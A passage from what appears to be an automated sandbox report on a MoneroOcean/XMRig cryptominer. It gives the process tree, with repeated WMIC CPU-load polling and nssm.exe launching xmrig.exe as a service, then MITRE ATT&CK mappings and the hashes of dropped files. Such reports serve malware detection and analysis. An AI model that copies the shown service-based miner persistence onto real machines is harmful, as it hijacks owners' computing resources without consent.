  PID:1028
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3760
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4944
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1392
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:960
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2356
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4800
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4952
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2764
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2900
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:836
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3588
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1208
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3240
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3928
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3104
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5104
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3028
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1804
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3044
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5080
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2648
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3164
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5116
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2252
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3700
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2320
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3284
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2348
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1496
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4752
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4416
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4756
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1712
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1408
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3900
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3128
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1448
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1048
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1340
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:692
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5048
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4860
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4308
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5004
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4316
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3712
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4188
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:556
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2688
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3388
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2300
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2768
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:860
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1776
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1700
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2600
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4864
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2036
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1672
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3860
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3360
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3268
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:764
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1460
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1632
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2760
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2848
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4320
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:876
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4608
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4940
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:896
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2692
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2508
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4972
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4120
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5032
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3688
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4040
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2204
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3108
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2004
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2476
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3172
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2456
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2676
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2924
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4496
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4648
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2440
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4116
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4328
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3048
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3624
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1624
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5100
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4352
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4988
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4008
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1580
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3744
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3156
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4304
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3208
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3052
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5104
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3504
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1628
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4464

C:\Users\Admin\moneroocean\nssm.exe
C:\Users\Admin\moneroocean\nssm.exe
1⤵
- Executes dropped EXE
PID:1148
- C:\Users\Admin\moneroocean\xmrig.exe
  "C:\Users\Admin\moneroocean\xmrig.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:2192

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
5f4c933102a824f41e258078e34165a7

SHA1
d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee

SHA256
d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2

SHA512
a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4261ffdf62571a5786f7dd549efb9d80

SHA1
4aaf955269902e0060b3f0111173278ac383ed66

SHA256
d503cc03a4f2a2fe4be5e1b3695d921eb1bd858b32a1b4798cc15a1c2f2c447e

SHA512
10e2b720ae47a24a9645b7ac697b4dd5708bd37ce6fddc4147d167c76a9225e87cb33a87796e23eda3093b03dea6becd2a1398fc1c043c140fece0e7c1e73094

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
459dafb1dda4bca5b22cbf25d0f5a823

SHA1
2f1acf87ba04a219d487a0756a90a65e5cf5c9aa

SHA256
f2a879cfcff09dec26b4dd62dc244fd549d4cd08326a68998ea1bf9dfdeb5103

SHA512
8603adffd4aafc625ff9593f46175a47905b7c224da2da5f2b8659c6f5910e1522c9e76f175fa869471d68011b7bc289d9d881ef7168f7bbec61cb20c3e7be4a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b69967f8c71e08a94c3f9be1b955d72c

SHA1
e6481b557aec167f395b26a1d1fdf7027951a880

SHA256
fd971f639df2f3374acd3a37122c98c036607e6307776cef67a7a0c9de825d15

SHA512
19816786f7679ca8107524dcf32c4665a5f1d90ed1b6b47c287d20588a48ad867a303bf883fa43809e68d943947ff86b41bb93dad8379f6f9ab6630588118e43

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
90ece7fdd319af178ba25de3b361bb2c

SHA1
f4ff3132005ab04fefe6dadf5616b1b424144e52

SHA256
b88359d2d33ebb3749dde349e80deb6278ca915a1c9dc324b7f17d965f1a351d

SHA512
76859d72c4cc3da9c2ddebb58d1bee29e495360753df1cbdc10710d9cca3140a966bdc5e1f7c1fafbe7a423df710b493b520684897e68e35eb329f12dc32f385

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6c22756f83518dd77bbf0fd2974cf3d0

SHA1
110c95dc28258500eebfdad5e46bbb184d22a28c

SHA256
09e0d03c29060a13fd39f152d5d7cabc145edafc215000a1910aab8d44e7e911

SHA512
aaf6ae963fef18e19237652f1bad841e597d4ac7c774b5adb0f1569601a5b7580485660fecc044aa6a5027de948e03cfa1001de0eb9237ae41b6d3313fb1dd61

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
fddb311e380b2e8427cb648b4ad09a17

SHA1
f68b72ea95d804aece52b84bb84de16915692f09

SHA256
151c8aaeb96087af673cdf6c3bac78d1fe16a09a1bc2bd7cf6e6a3f64f30f376

SHA512
1be412ebbfcbe2ba9987974ad7afa067759cc88bb378b1154bb68c381fdace26b65912dbc706503fbe69ecb46c1f46a6af3303dd03da02b751a851ae79e2afaf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
86d3ee1e28e4502f3930d328fad26930

SHA1
b289690d6e641d904d20889f523d79a4cedd3db5

SHA256
de5e6b39210ce003fd9533681262d736a99e5dd6bcc6bbf59e9d588c54e5b486

SHA512
28671fa3b1e45c504bd70f72db06b99651df9016a7c57b56849cb47dc080b7958f449c1e9c49a0938c0a93a34c9f522faa4ef858e69bbeb4777db09ee700b18d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
17a60c9cac37cf5412f4cd266c22a435

SHA1
648aed53b8f323be19dfb75e1c61e9dd95fdd0fd

SHA256
de36be11adf1651810ebee5d6214786e3a6045ac7ee51730036385f504d4653d

SHA512
43c8160d5e32d6aeae36201e7580dfd2d47b53ceba28443b2aedefd32377448296ce805669b5136686378603af1348d58fb40a59b906c28aed2df6f7d98b4044

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
fedcc8059d31838ee66c4c17276d9f31

SHA1
2e33b7f1aec5466ab97d94fca0554acb74904f4f

SHA256
e9bfa37b7dbf647eaeecd8fab3b2b31a3be0874325e144721b674bb6af76bd66

SHA512
da7995fd25e642e2f3dce5a5d20cd6e132417dcb10a9a0cf6b006314f49e9f258447cf5c886b3eb42f8831581c6bf9846fbf7164a55d0cbe97caedc72921032d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1b3d6325e17ad43e8b6ae87ba7db1cce

SHA1
7f692faa63fbc66aa09c13556e01a1f464564310

SHA256
73eee108ec3feccd54dfaaeb650ff1b578d14c02cb6a69bd381b96d5cd469f41

SHA512
1f21db6a7ca022a1a27d881c7f8c0a5b81e53bf29f4dceb6bdccdd29a1cb52e9d62502c8f8aa5980d2a56b718af4de29bca65580322f74e59329472ecd23ded0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
1c6495a58a1b0679c76dc4fe2df2c3cb

SHA1
67eccd75add684d2267766c31716c17a299cfd19

SHA256
66a67fa0a1250929073cba832220abbc62d93144dca58babbecc30632ae42853

SHA512
68beb0cd075196453e5219352170d33ff7799d777669d29b0ae2e6fdccd7423f2bb7291ec6ca5371b76aab121059a592380018eeef9cdc6391e2e6aed32e6757

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
71de3d4e6a902c41e5d87b031a5a1910

SHA1
38da8e3af858eb6ad51af0aca573ed73c244cb21

SHA256
19c786a0d1be5f808940dfb0bfcdf3e78a1e4881cb326fabe044b9c7c2970466

SHA512
c3811686eead6874ad81483349e693e1ba89ef4c38d001cfdc5e49c5085d13649940a623a2e3cfd12d3ff887e6d12c11b3a832b09e00577d623cf4d7c03f7554

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_u5zjsczt.j44.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp82AD.tmp.bat

Filesize
14KB

MD5
623f6006f683afdb4b7406e3a4ec35bf

SHA1
f63f03d7338317224726eba368f1a045fa2142d7

SHA256
21d6e0b0e8135a929a77f48e00d286bfa4fc2d749a61529e559b8a5ceb63e47b

SHA512
df7ae1e436be99bbf9ec7fe1fb745c9e2dba6b99e24019b5b1f78786198f1aed465575a829e9b8141bc92f0a4c4269e140228b4335f9fa724a60f1330ad6d3ab

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
64cafb884608c751a2bccaca7c582e0f

SHA1
924f71ecb4903ab63a13a125e62fd6e5f5d20cb2

SHA256
3250e852f2fb3e61bd0642d92f1decac666777da7c4d59d6270ee49fc856151b

SHA512
ddd68d3d13bd65f926f6be67ac891c143d6e282ee955871382452f2627ca42ed54e7363d83651b904cdf8054bc1d12a02becd44ac1b5cdc98ac42fc7ebfe97a0

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
0d0f4262f5e08287292125df0e33326f

SHA1
6af218dd334cc86d2f69aa0822efeee653d1ea57

SHA256
856ef27a1eec8794088cfc6511e666a83774263bc15ad2627560831435d79fe8

SHA512
1c6ca6dddb226b425210a0fe8f54cbf7d44f48b2e1cfa3da5f12e9ae436f5df3ce28f0971969cb4cd82e21740db2a7258f4415c13d19185ca706c7f6c5efc830

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
b9d7cc0307aeef7556c1c44ac3a0fc9f

SHA1
9d36c257cf4e05581655f8ae08f1c4b0891d3631

SHA256
e1c77a138e10d9d1d038602e52112704bb1eeb139fad7e5064d065e2d82f83fb

SHA512
7875be1651e68fa246b3c6720c1ad1915f128b4d97975abda864f23d8438d270bd345d590a745b964239921afb7b3bcea7f600cee04c266572534b06f1a91686

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
209017614375c50415c251530dc2f3f2

SHA1
519a37a5c051dd30da9b32a533192f7e191968c4

SHA256
d23387f9c2de0af62e971aba6fa234c71627e0f374e375dda75405573887ae74

SHA512
6164717715d5cfc73c3108e18fa8a430978bd4eae36cf97a061832ab2fda0811a072461c349bbf804b86af52e72696319b8983de5c962fdc2c2de0fb7aaac936

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
d4f8a13f8c90e2b3b2e7d30a553df39c

SHA1
5c5303ef682ffcd31e57d1abd900ba5b637d51e4

SHA256
f7fc5b53e709adc1f4116ff47656f7262d7fb2859a100b3e3a5568453485649a

SHA512
68b0b59a732fecc8b345fa0429039d36bc3031ab65198e4d3783a5c16fa768bb6562131c1db58d00ad9c4af7fd8d77aed3c2150930663280a6bbd635ba5831bd

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
c9ef9c214996db3d88f571226910c5d5

SHA1
420ba30247b1e09f706557a7704a1ebee5d3165c

SHA256
fa55a24dccbf28309642d958cbb73f5053e3a56baa0eda22d4581e0151f5f7c1

SHA512
de91ef4268e67c4fa8d7216637bd9ca69ea33b108352675c954d4719d2d58b9414df78c6ebc8f622fcfbeda4ad5f981c2a17a48f7eeae8626cefe5b6894ec68d

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
725d38d9eeadc9c2691063936b01f9ec

SHA1
153fd5bd55cfd845516562291a7ab867d68145b5

SHA256
0df3cdd812a582b5ddf5c8019fe7aecf03edb5760f4cf2d0c81ba73590a2ec43

SHA512
fe2758ddaa974696c733367d479dc54695ee1f177275f3b26d575b3c27b8c968b6bab0ce1e5b715e6513d1f39d880462b3d8cc542507f2eeae531a9a6d337658

Download Submit
C:\Users\Admin\moneroocean\nssm.exe

Filesize
360KB

MD5
1136efb1a46d1f2d508162387f30dc4d

SHA1
f280858dcfefabc1a9a006a57f6b266a5d1fde8e

SHA256
eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848

SHA512
43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5

Download Submit
C:\Users\Admin\moneroocean\xmrig.exe

Filesize
9.0MB

MD5
9ee2c39700819e5daab85785cac24ae1

SHA1
9b5156697983b2bdbc4fff0607fadbfda30c9b3b

SHA256
e7c13a06672837a2ae40c21b4a1c8080d019d958c4a3d44507283189f91842e3

SHA512
47d81ff829970c903f15a791b2c31cb0c6f9ed45fdb1f329c786ee21b0d1d6cd2099edb9f930824caceffcc936e222503a0e2c7c6253718a65a5239c6c88b649

Download Submit
C:\Users\Admin\nssm.zip

Filesize
135KB

MD5
7ad31e7d91cc3e805dbc8f0615f713c1

SHA1
9f3801749a0a68ca733f5250a994dea23271d5c3

SHA256
5b12c3838e47f7bc6e5388408a1701eb12c4bbfcd9c19efd418781304590d201

SHA512
d7d947bfa40d6426d8bc4fb30db7b0b4209284af06d6db942e808cc959997cf23523ffef6c44b640f3d8dbe8386ebdc041d0ecb5b74e65af2c2d423df5396260

Download Submit
C:\Users\Admin\xmrig.zip

Filesize
3.5MB

MD5
640be21102a295874403dc35b85d09eb

SHA1
e8f02b3b8c0afcdd435a7595ad21889e8a1ab0e4

SHA256
ed33e294d53a50a1778ddb7dca83032e9462127fce6344de2e5d6be1cd01e64b

SHA512
ece0dfe12624d5892b94d0da437848d71b16f7c57c427f0b6c6baf757b9744f9e3959f1f80889ffefcb67a755d8bd7a7a63328a29ac9c657ba04bbdca3fea83e

Download Submit
memory/1636-38-0x000001FEBA4F0000-0x000001FEBA502000-memory.dmp

Filesize
72KB

Download
memory/1636-37-0x000001FEBA4A0000-0x000001FEBA4AA000-memory.dmp

Filesize
40KB

Download
memory/2192-201-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2192-216-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2192-250-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2192-249-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2192-248-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2192-247-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2192-246-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2192-245-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2192-189-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2192-190-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2192-191-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2192-192-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2192-193-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2192-194-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2192-195-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2192-196-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2192-197-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2192-198-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2192-199-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2192-200-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2192-244-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2192-202-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2192-203-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2192-204-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2192-205-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2192-206-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2192-207-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2192-208-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2192-209-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2192-210-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2192-211-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2192-212-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2192-213-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2192-214-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2192-215-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2192-243-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2192-217-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2192-218-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2192-219-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2192-220-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2192-221-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2192-222-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2192-223-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2192-225-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2192-226-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2192-227-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
